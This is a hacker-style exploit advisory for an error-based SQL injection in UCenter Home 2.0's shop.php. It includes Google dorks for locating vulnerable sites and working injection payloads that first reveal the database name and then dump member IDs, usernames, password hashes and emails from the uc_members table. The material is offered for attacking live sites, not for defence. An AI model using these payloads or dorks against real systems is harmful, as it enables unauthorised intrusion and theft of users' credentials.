__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and Iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB to `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1